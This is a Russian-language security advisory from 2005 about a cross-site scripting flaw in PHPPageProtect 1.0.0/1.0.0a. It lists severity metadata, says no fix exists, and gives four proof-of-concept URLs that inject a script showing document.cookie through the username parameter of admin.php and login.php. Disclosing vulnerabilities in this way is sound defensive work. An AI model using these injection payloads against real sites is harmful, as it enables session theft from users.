Security Lab

Межсайтовый скриптинг в PHPPageProtect

Дата публикации:20.07.2005
Всего просмотров:1060
Опасность:
Низкая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PHPPageProtect 1.x
Уязвимые версии: PHPPageProtect 1.0.0, 1.0.0а

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным.

Уязвимость существует в сценариях 'admin.php' и 'login.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного URL полнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[target]/[path]/admin.php?username=">
<script>alert(document.cookie)</script><!--

http://[target]/ [path]/admin.php?username=
%22%3E%3Cscript%3Ealert%28document.
cookie%29%3C%2Fscript%3E%3C%21--

http://[target]/[path]/login.php?username=">
< script>alert(document.cookie)< /script><!--

http://[target]/[path]/login.php?username=
%22%3E%3Cscript%3Ealert%28document.
cookie%29%3C%2Fscript%3E%3C%21--

URL производителя: php.warpedweb.net/pageprotect/

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PHPPageProtect Version 1.0.0 / 1.0.0a XSS POC Exploit